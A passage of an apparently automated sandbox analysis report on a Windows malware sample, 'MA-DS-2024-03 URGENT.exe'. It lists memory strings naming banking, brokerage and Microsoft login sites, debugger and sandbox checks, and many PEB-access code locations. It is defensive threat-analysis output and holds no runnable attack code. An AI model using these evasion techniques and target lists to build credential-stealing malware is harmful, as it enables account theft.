                Source: AppVClient.exe, 0000000B.00000002.1295498591.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000003.1284482715.000000000057F000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 0000000B.00000003.1285279681.00000000005AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                Source: G109m407.17.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: G109m407.17.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: G109m407.17.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: G109m407.17.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: choice.exe, 00000011.00000002.2500574105.00000000027C5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2081697532.0000022C2C93C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: G109m407.17.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: G109m407.17.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: G109m407.17.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: G109m407.17.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: G109m407.17.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: G109m407.17.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: G109m407.17.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: G109m407.17.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: G109m407.17.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: G109m407.17.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: G109m407.17.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: G109m407.17.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | API call chain: ExitProcess graph end node graph_0-108798
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | API call chain: ExitProcess graph end node graph_0-109141
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\choice.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0377096E rdtsc 4_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_00417D33 LdrLoadDll, 4_2_00417D33
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00473F09 BlockInput, 0_2_00473F09
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B3A
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00435A7C
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress, 0_2_00404B37
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0056C594 mov eax, dword ptr fs:[00000030h] 0_2_0056C594
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00B664D8 mov eax, dword ptr fs:[00000030h] 0_2_00B664D8
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00B66478 mov eax, dword ptr fs:[00000030h] 0_2_00B66478
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_00B64E38 mov eax, dword ptr fs:[00000030h] 0_2_00B64E38
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_01671130 mov eax, dword ptr fs:[00000030h] 0_2_01671130
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_016B3F3D mov eax, dword ptr fs:[00000030h] 0_2_016B3F3D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037D437C mov eax, dword ptr fs:[00000030h] 4_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B035C mov eax, dword ptr fs:[00000030h] 4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B035C mov ecx, dword ptr fs:[00000030h] 4_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037FA352 mov eax, dword ptr fs:[00000030h] 4_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037D8350 mov ecx, dword ptr fs:[00000030h] 4_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B2349 mov eax, dword ptr fs:[00000030h] 4_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0372C310 mov ecx, dword ptr fs:[00000030h] 4_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03750310 mov ecx, dword ptr fs:[00000030h] 4_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376A30B mov eax, dword ptr fs:[00000030h] 4_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037663FF mov eax, dword ptr fs:[00000030h] 4_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037403E9 mov eax, dword ptr fs:[00000030h] 4_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037DE3DB mov eax, dword ptr fs:[00000030h] 4_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037DE3DB mov ecx, dword ptr fs:[00000030h] 4_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037D43D4 mov eax, dword ptr fs:[00000030h] 4_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037EC3CD mov eax, dword ptr fs:[00000030h] 4_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037383C0 mov eax, dword ptr fs:[00000030h] 4_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B63C0 mov eax, dword ptr fs:[00000030h] 4_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03728397 mov eax, dword ptr fs:[00000030h] 4_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0372E388 mov eax, dword ptr fs:[00000030h] 4_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0375438F mov eax, dword ptr fs:[00000030h] 4_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037E0274 mov eax, dword ptr fs:[00000030h] 4_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03734260 mov eax, dword ptr fs:[00000030h] 4_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0372826B mov eax, dword ptr fs:[00000030h] 4_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0372A250 mov eax, dword ptr fs:[00000030h] 4_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03736259 mov eax, dword ptr fs:[00000030h] 4_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037EA250 mov eax, dword ptr fs:[00000030h] 4_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B8243 mov eax, dword ptr fs:[00000030h] 4_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B8243 mov ecx, dword ptr fs:[00000030h] 4_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0372823B mov eax, dword ptr fs:[00000030h] 4_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037402E1 mov eax, dword ptr fs:[00000030h] 4_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0373A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037402A0 mov eax, dword ptr fs:[00000030h] 4_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C62A0 mov eax, dword ptr fs:[00000030h] 4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C62A0 mov ecx, dword ptr fs:[00000030h] 4_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376E284 mov eax, dword ptr fs:[00000030h] 4_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B0283 mov eax, dword ptr fs:[00000030h] 4_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0372C156 mov eax, dword ptr fs:[00000030h] 4_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C8158 mov eax, dword ptr fs:[00000030h] 4_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03736154 mov eax, dword ptr fs:[00000030h] 4_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C4144 mov eax, dword ptr fs:[00000030h] 4_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C4144 mov ecx, dword ptr fs:[00000030h] 4_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03760124 mov eax, dword ptr fs:[00000030h] 4_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037DA118 mov ecx, dword ptr fs:[00000030h] 4_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037DA118 mov eax, dword ptr fs:[00000030h] 4_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_038061E5 mov eax, dword ptr fs:[00000030h] 4_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037F0115 mov eax, dword ptr fs:[00000030h] 4_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037DE10E mov eax, dword ptr fs:[00000030h] 4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037DE10E mov ecx, dword ptr fs:[00000030h] 4_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037601F8 mov eax, dword ptr fs:[00000030h] 4_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037AE1D0 mov eax, dword ptr fs:[00000030h] 4_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037AE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037F61C3 mov eax, dword ptr fs:[00000030h] 4_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B019F mov eax, dword ptr fs:[00000030h] 4_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A197 mov eax, dword ptr fs:[00000030h]4_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A197 mov eax, dword ptr fs:[00000030h]4_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A197 mov eax, dword ptr fs:[00000030h]4_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03770185 mov eax, dword ptr fs:[00000030h]4_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EC188 mov eax, dword ptr fs:[00000030h]4_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EC188 mov eax, dword ptr fs:[00000030h]4_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D4180 mov eax, dword ptr fs:[00000030h]4_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D4180 mov eax, dword ptr fs:[00000030h]4_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375C073 mov eax, dword ptr fs:[00000030h]4_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03732050 mov eax, dword ptr fs:[00000030h]4_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6050 mov eax, dword ptr fs:[00000030h]4_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6030 mov eax, dword ptr fs:[00000030h]4_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A020 mov eax, dword ptr fs:[00000030h]4_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C020 mov eax, dword ptr fs:[00000030h]4_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E016 mov eax, dword ptr fs:[00000030h]4_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B4000 mov ecx, dword ptr fs:[00000030h]4_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D2000 mov eax, dword ptr fs:[00000030h]4_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C0F0 mov eax, dword ptr fs:[00000030h]4_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037720F0 mov ecx, dword ptr fs:[00000030h]4_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037380E9 mov eax, dword ptr fs:[00000030h]4_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B60E0 mov eax, dword ptr fs:[00000030h]4_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B20DE mov eax, dword ptr fs:[00000030h]4_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F60B8 mov eax, dword ptr fs:[00000030h]4_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F60B8 mov ecx, dword ptr fs:[00000030h]4_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C80A8 mov eax, dword ptr fs:[00000030h]4_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373208A mov eax, dword ptr fs:[00000030h]4_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738770 mov eax, dword ptr fs:[00000030h]4_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740770 mov eax, dword ptr fs:[00000030h]4_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730750 mov eax, dword ptr fs:[00000030h]4_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BE75D mov eax, dword ptr fs:[00000030h]4_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772750 mov eax, dword ptr fs:[00000030h]4_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772750 mov eax, dword ptr fs:[00000030h]4_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B4755 mov eax, dword ptr fs:[00000030h]4_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376674D mov esi, dword ptr fs:[00000030h]4_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376674D mov eax, dword ptr fs:[00000030h]4_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376674D mov eax, dword ptr fs:[00000030h]4_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376273C mov eax, dword ptr fs:[00000030h]4_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376273C mov ecx, dword ptr fs:[00000030h]4_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376273C mov eax, dword ptr fs:[00000030h]4_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AC730 mov eax, dword ptr fs:[00000030h]4_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C720 mov eax, dword ptr fs:[00000030h]4_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C720 mov eax, dword ptr fs:[00000030h]4_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730710 mov eax, dword ptr fs:[00000030h]4_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03760710 mov eax, dword ptr fs:[00000030h]4_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C700 mov eax, dword ptr fs:[00000030h]4_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037347FB mov eax, dword ptr fs:[00000030h]4_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037347FB mov eax, dword ptr fs:[00000030h]4_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037527ED mov eax, dword ptr fs:[00000030h]4_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037527ED mov eax, dword ptr fs:[00000030h]4_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037527ED mov eax, dword ptr fs:[00000030h]4_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BE7E1 mov eax, dword ptr fs:[00000030h]4_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373C7C0 mov eax, dword ptr fs:[00000030h]4_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B07C3 mov eax, dword ptr fs:[00000030h]4_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037307AF mov eax, dword ptr fs:[00000030h]4_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E47A0 mov eax, dword ptr fs:[00000030h]4_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D678E mov eax, dword ptr fs:[00000030h]4_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03762674 mov eax, dword ptr fs:[00000030h]4_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F866E mov eax, dword ptr fs:[00000030h]4_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F866E mov eax, dword ptr fs:[00000030h]4_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A660 mov eax, dword ptr fs:[00000030h]4_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A660 mov eax, dword ptr fs:[00000030h]4_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374C640 mov eax, dword ptr fs:[00000030h]4_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374E627 mov eax, dword ptr fs:[00000030h]4_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03766620 mov eax, dword ptr fs:[00000030h]4_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768620 mov eax, dword ptr fs:[00000030h]4_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0373262C mov eax, dword ptr fs:[00000030h]4_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03772619 mov eax, dword ptr fs:[00000030h]4_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE609 mov eax, dword ptr fs:[00000030h]4_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0374260B mov eax, dword ptr fs:[00000030h]4_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AE6F2 mov eax, dword ptr fs:[00000030h]4_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B06F1 mov eax, dword ptr fs:[00000030h]4_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B06F1 mov eax, dword ptr fs:[00000030h]4_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A6C7 mov eax, dword ptr fs:[00000030h]4_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037666B0 mov eax, dword ptr fs:[00000030h]4_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C6A6 mov eax, dword ptr fs:[00000030h]4_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734690 mov eax, dword ptr fs:[00000030h]4_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03734690 mov eax, dword ptr fs:[00000030h]4_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376656A mov eax, dword ptr fs:[00000030h]4_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376656A mov eax, dword ptr fs:[00000030h]4_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376656A mov eax, dword ptr fs:[00000030h]4_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738550 mov eax, dword ptr fs:[00000030h]4_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738550 mov eax, dword ptr fs:[00000030h]4_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740535 mov eax, dword ptr fs:[00000030h]4_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E53E mov eax, dword ptr fs:[00000030h]4_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6500 mov eax, dword ptr fs:[00000030h]4_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
